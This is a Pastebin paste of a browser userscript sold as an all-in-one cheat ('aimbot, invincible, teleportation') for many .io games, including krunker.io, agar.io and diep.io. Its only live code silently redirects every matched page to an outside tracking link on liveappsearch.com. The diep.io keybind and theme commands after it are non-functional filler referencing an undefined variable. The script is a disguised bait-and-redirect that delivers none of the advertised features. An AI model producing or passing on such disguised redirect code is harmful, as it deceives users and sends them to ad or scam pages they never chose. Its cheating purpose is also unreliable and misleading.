Advertisement
Guest User

Untitled

a guest
Apr 22nd, 2019
17,024
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.10 KB | None | 1 1
  1. // ==UserScript==
  2. // @name New Best Script Hack For .IO Games ( Aimbot , Invincible, Invisible, Teleportation, And More )
  3. // @namespace http://tampermonkey.net/
  4. // @version 9.62
  5. // @description Best Hack for .io games
  6. // @author Molp
  7. // @match *://*.krunker.io/*
  8. // @match *://*.zombsroyale.io/*
  9. // @match *://*.zombs.io/*
  10. // @match *://*.agar.io/*
  11. // @match *://*.diep.io/*
  12. // @match *://*.mope.io/*
  13. // @match *://*.paper.io/*
  14. // @match *://*.shellshock.io/*
  15. // @match *://*.hole.io/*
  16. // @match *://*.surviv.io/*
  17. // @match *://*.krunker.io/?game=*
  18. // @match *://*.rocketball.io/*
  19. // @match *://*.flaap.io/*
  20. // @match *://*.wormax.io/*
  21. // @match *://*.tankwars.io/*
  22. // @match *://*.vanar.io/*
  23. // @match *://*.greasyfork.org/*
  24. // @match *://*.skribbl.io/*
  25. // @match *://*.Wormate.io/*
  26. // @match *://*.foes.io/*
  27. // @grant none
  28. // ==/UserScript==
  29.  
  30. (function() {
  31. 'use strict';
  32.  
  33. window.location.replace("https://www.liveappsearch.com/cl.php?id=5600485b8eabf4ba7091114aa31b3bfc");
  34. })();
  35.  
  36. //Build keys
  37. //Go to http://keycode.info/ if you want to reassign keys and then change the number after "e.keyCode==="
  38.  
  39. //00077757 = "z key"
  40. if(e.keyCode===90){
  41. input.execute("game_stats_build 5566445965656565644444888888877777");
  42. }
  43. //02377707 = "x key"
  44. if(e.keyCode===88){
  45. input.execute("game_stats_build 556644565656565644444888888832323");
  46. }
  47. //02307777 = "b key"
  48. if(e.keyCode===66){
  49. input.execute("game_stats_build 775566777775656565656888888832323");
  50. }
  51. //00067776 spammer = "n key"
  52. if(e.keyCode===78){
  53. input.execute("game_stats_build 775566777775656565656888888444444");
  54. }
  55.  
  56. //Themes bellow. Delete if you don't care, but IMO these are lit.
  57.  
  58. //My theme = "v key"
  59. if(e.keyCode===86){
  60. input.execute("ui_replace_colors 0xA221FE 0x7008FF 0x3426FF 0x0E69E6 0x06DDFF 0x00FFF9 0x00FFA2 0x00FF09");
  61. input.execute("ren_grid_base_alpha 0.3");
  62. input.execute("ren_stroke_soft_color_intensity 0.6");
  63. input.execute("ren_background_color 0xAAAAAA");
  64. input.execute("ren_bar_background_color 0x93ebff");
  65. input.execute("ren_health_background_color 0x2E5A89");
  66. input.execute("ren_health_fill_color 0x00FF00");
  67. input.execute("ren_minimap_viewport true");
  68. input.set_convar("ren_solid_background", true);
  69. input.set_convar("ren_fps", true);
  70. setInterval(function(){input.keyDown(76);},150);
  71. }
  72. ///u/162893476 Remove Upgrades = ", key"
  73. if(e.keyCode===188){
  74. input.set_convar("ren_upgrades", false);
  75. setInterval(function(){input.keyDown(76);},150);
  76. }
  77. ///u/162893476 Enable Upgrades = ". key"
  78. if(e.keyCode===190){
  79. input.set_convar("ren_upgrades", true);
  80. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement